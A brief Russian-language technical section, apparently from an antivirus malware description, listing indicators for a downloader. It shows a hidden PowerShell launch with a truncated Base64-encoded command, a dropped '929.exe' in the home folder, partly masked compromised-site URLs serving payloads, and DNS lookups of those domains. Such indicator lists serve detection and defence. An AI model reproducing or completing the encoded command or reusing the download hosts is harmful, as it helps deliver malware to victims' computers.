Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAHQAZgB1AGQAcgBmAHcAdwByAHcAcAA9ACcASQBrAHEAYwBhAG0AegB1AGEAdwBpAHQAdAAnADsAJABSAHQAaABqAHAAcQBrAGkAbwAgAD0AIAAnADkAMgA5ACcAOwAkAFAAdwBzAGoAcgBvAGkAbgBiAGUAZQB4AGwAPQAnAEQAbAB...
- %HOMEPATH%\929.exe
- %HOMEPATH%\929.exe
- http://tr######cbieudienyenle.com/wp-content/cache/gx9nu/
- http://www.tr######cbieudienyenle.com/wp-content/cache/gx9nu/
- http://la###store.com/tmp/rb7p5/
- http://www.er###antum.com/scripts/V5l3/
- DNS ASK tr######cbieudienyenle.com
- DNS ASK la###store.com
- DNS ASK er###antum.com
- DNS ASK ip###erkez.com
- DNS ASK su###attra.com